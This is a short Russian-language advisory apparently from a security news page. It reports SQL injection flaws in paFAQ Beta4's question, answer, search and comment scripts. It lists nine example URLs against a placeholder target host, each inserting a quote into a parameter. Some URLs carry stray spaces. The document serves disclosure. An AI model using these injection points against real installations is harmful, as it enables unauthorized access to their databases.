Программа: paFAQ Beta4

Уязвимость позволяет удаленному
пользователю выполнить произвольные SQL
команды в базе данных уязвимого приложения.
Уязвимость существует в сценариях ‘question.php’,
‘answer.php’, ‘search.php’, и ‘comment.php’ из-за некорректной
фильтрации некоторых параметров. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольные
SQL команды на сервере.

Пример:

http://[target]/index.php?act=Question&id=1 &limit=10&orderby=q_id&order=DESC&offset=’
http://[ta rget]/index.php?act=Question&id=1 &orderby=q_id&order=DESC&limit=’
http://[target]/index.php?act=Question&id=1 &orderby=q_id&order=’&limit=10
http://[target]/index.php?ac t=Question&id=1 &orderby=’&order=DESC&limit=10
http://[target]/index.php?act=Answer&cid=1 &id=1&offset=’
http://[target]/index.php?act=Search&code=01 &search_item=’
http: //[target]/index.php?act=Speak&code=05 &poster=1&name=2&question=3&email=4&cat_id=’
http://[target]/index.php?act=Speak&code=02 &cid=’&id=1&poster=1&name=2&answer=3&email=
4
http://[target]/index.php?act=Speak&code=02 &cid=1&id=’&poster=1&name=2&answer=3&email=4



Оставить мнение